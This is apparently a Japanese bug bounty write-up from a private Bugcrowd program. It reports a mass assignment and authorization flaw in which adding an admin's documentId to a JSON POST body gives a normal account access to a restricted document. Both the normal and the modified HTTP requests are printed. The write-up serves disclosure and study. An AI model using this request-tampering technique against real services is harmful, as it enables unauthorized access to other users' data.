Hello there, ('ω')ノ
追加のJSON本文コンテンツを含む制限付きドキュメントへのアクセスを。
脆弱性:
Mass Assignment
承認の欠陥
記事:
プログラムはBugcrowdで非公開で。
ユーザは、チーム内でドキュメントを簡単に送信、編集、および管理できて。
ここでは、管理者と通常のアカウントを使用して。
管理者アカウントからアクセスを許可しないドキュメントを作成して。
通常のアカウントからそのドキュメントにアクセスしようとすると。
すべてのAPIエンドポイントで、閲覧禁止の403エラーが発生して。
自分のアカウントで、ドキュメントを編集しているときに。
通常のアカウントから、リクエストのjson本体に。
documentIdが含まれていることに気付いて。
自分(通常)のアカウントドキュメントを編集しているときに。
リクエストのjson本体にdocumentIdが含まれていることに気付いて。
空白のドキュメントを作成するときに。
jsonリクエストの本文にAdmin documentIdを追加しようと思って。
下記が通常のリクエストで。
注意する点は、リクエストにdocumentIdがないことで。
POST /api/accounts/envelope/ HTTP/1.1
Host: redacted.com
{“enableResponsiveChoice”:false,”emailBlurb”:null,”emailSubject”:null,”autoNavigation”:false,”status”:”created”,”notification”:{“useAccountDefaults”:true}}
下記が、リクエストにdocumentIdを追加したもので。
リクエストすると管理ドキュメント情報を使用して新しいドキュメントが作成されて。
POST /api/accounts/envelope/ HTTP/1.1
Host: redacted.com
{“enableResponsiveChoice”:false,”emailBlurb”:null,”emailSubject”:null,”autoNavigation”:false,”status”:”created”,”notification”:{“useAccountDefaults”:true},”documentId”:”documentIdofAdmin”}
Best regards, (^^ゞ